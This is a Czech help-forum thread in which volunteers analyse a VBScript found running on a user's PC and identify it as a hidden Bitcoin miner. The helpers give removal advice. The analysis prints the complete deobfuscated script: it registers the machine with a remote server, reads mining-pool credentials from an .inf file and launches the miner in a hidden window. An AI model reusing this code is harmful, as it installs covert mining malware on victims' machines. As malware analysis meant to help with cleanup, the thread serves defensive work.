Scrip/vir help

[Lany]

Zdravím dnes jsem pustil PC a vyskočilo mi toto viz. příloha. Zkoušel jsem projet složky antivirákem, nic nenašel když jsem se podíval do složky /system32/ msregcx.vbe tak tento soubor nemůžu ani najít v PC. předem díky za všechny rady

[Reklama]

[Uziv00]

Vítej na PC-HELP!
Oba jsou vbs skripty. Jeden jsem už zde rozebíral:

Tak se mi to povedlo rozkódovat. Už samotný kód nevypadá na to, že ho psal někdo normálně, ale můžu se plést.
V první etapě si zjištuje cestu k adresáři windows a cestu k domovskému adresáři uživatele:

Kód: Vybrat vše

set shell=wScriPt.CreateObject("WScript.Shell")
wIndowSdIr=sheLl.ExpaNdenVIronmentStrIngs("%windir%")
hOmeDir=shell.expandEnvironmentstrings("%USERPROFILE%")
WscrIpt.echo hoMedIr

Zde je zajímavá chybka - příkaz wscript.echo zobrazí cestu k domovskému adresáři (nevím proč, možná nějaký zbytek po ladění?) - a to je právě ta hláška co se ti zobrazuje.

Ve druhé etapě kontroluje přítomnost knihovny OpenCL.dll. Nemám tušení k čemu slouží, snad kolegové pohohou. Když ji nenajde, tak se pravděpodobně (tím si nejsem 100% jistý) pokouší někam připojit a něco zřejmě stáhnout a zaregistrovat.

Kód: Vybrat vše

If objFSO.FIleexists(windowsdIr&"\system32\OpenCL.dll")Then
if Not oBjFSO.FilEExIsts(hOmedir&"\regbcm")THEn sEt objXmLhTTP=CreateObject("MSXML2.XMLHTTP")
objxMLhTtP.open"GET","http://msdrv64.com/register_slave.php",False
objXMLHttP.Send()
Set regFile=objFsO.CreaTeTextFile(homedIr&"\regbcm",TRue)
regFile.Close
End if

No a v dalším - kontroluje nějakou službu windows, zapisuje nějaké přihlašovací údaje do ntvdm.inf. Vytváří nějaký exe soubor ve windows\inf a snaží se jej spustit. Podle toho inf souboru se snaží spustit proces msrcoxht, který by se měl připojit na server tcp://mint.bitminter.com:3333 se jménem a heslem uvedeným opět v ntvdm.inf. Na víc mé znalosti bohužel nestačí. Ale třeba ti to něco řekne. Nebo někomu zde.

Kód: Vybrat vše

Set ObjwMIServiCe=GEtObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
sEt objstartup=oBjWMIServiCe.Get("Win32_ProcessStartup")
SEt objConFig=ObjSTArtup.SpawnInstaNce_
objConfiG.ShowWindOw=12
Set objProcESs=GetObjEcT("winmgmts:root\cimv2:Win32_Process")
Set objFSO=CreateObject("Scripting.FileSystemObject")
SeT lisTfile=objFSo.OpeNTexTFilE("c:\windows\inf\ntvdm.inf")
eXEcName=lIstFile.ReAdLine
urL=lIstFIle.ReadLine
login=listfile.ReadLine
PassWOrd=LisTFilE.ReadLine
path=winDowsdir&"\inf\"&execNAmE&"\"&exeCName&".exe -o "&url&" -u "&login&" -p "&passworD
errReturN=ObjProcess.CrEate(path,null,oBjconFig,iNTProcessID)

K tomu ještě dodám, že původní kód je tento:

Kód: Vybrat vše

Microsoft (R) Windows Script Host verze 5.7
Copyright (C) Microsoft Corporation 1996-2001. Vçechna pr va vyhrazena.

set shell=wScriPt.CreateObject("WScript.Shell"):wIndowSdIr=sheLl.ExpaNdenVIronmentStrIngs("%windir%"):hOmeDir=shell.expandEnvironmentstrings("%USERPROFILE%"):WscrIpt.echo hoMedIr:Set objFSO=CreateObject("Scripting.FileSystemObject"):If objFSO.FIleexists(windowsdIr&"\system32\OpenCL.dll")Then if Not oBjFSO.FilEExIsts(hOmedir&"\regbcm")THEn sEt objXmLhTTP=CreateObject("MSXML2.XMLHTTP"):objxMLhTtP.open"GET","http://msdrv64.com/register_slave.php",false:objXMLHttP.Send():Set regFile=objFsO.CreaTeTextFile(homedIr&"\regbcm",TRue):regFile.Close:End if:Set ObjwMIServiCe=GEtObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2"):sEt objstartup=oBjWMIServiCe.Get("Win32_ProcessStartup"):SEt objConFig=ObjSTArtup.SpawnInstaNce_:objConfiG.ShowWindOw=12:Set objProcESs=GetObjEcT("winmgmts:root\cimv2:Win32_Process"):Set objFSO=CreateObject("Scripting.FileSystemObject"):SeT lisTfile=objFSo.OpeNTexTFilE("c:\windows\inf\ntvdm.inf"):eXEcName=lIstFile.ReAdLine:urL=lIstFIle.ReadLine:login=listfile.ReAdLiNe:PassWOrd=LisTFilE.ReaDLine:path=winDowsdir&"\inf\"&execNAmE&"\"&exeCName&".exe -o "&url&" -u "&login&" -p "&passworD:errReturN=ObjProcess.CrEate(path,null,oBjconFig,iNTProcessID):End If


Tedy kód je napsán na jednom řádku a příkazy jsou odděleny dvojtečkou, což se taky zrovna moc neužívá.

Mělo by stačit vymazat odkaz na jeho spuštění. Buď bude v položce p spuštění, nebo v klíči RUN v registrech, popřípadě ještě jinde.
Nebo vlož přídpěvek do sekce HijakThis a vytvoř log v HijackThis a vlož tamtéž. Naši virobijci se ti na to podívají. Jak vytvořit log najdeš v článcích a návodech.

[jerabina]

Děkuji ITCrowd za dodatečné informace

Jedná se o Bitcoin Miner, který je zažraný docela hluboko do systému, proto by chtělo odstranit všechny součástí v sekci HiJackThis. Udělej si tam nové téma s logem z programu HiJackThis (návod v mém podpisu), jedná se o základní diagnostikační nástroj.

OpenCL.dll je standardně součást software od AMD, netuším proč BTC.Miner kontroluje umístění této knihovny v systému, každopádně co jsem hledal, tak to dělá více typů BTC.Mineru. Možná, že BTC.Miner používá některé metody/funkce z té knihovny, ale jistý si nejsem.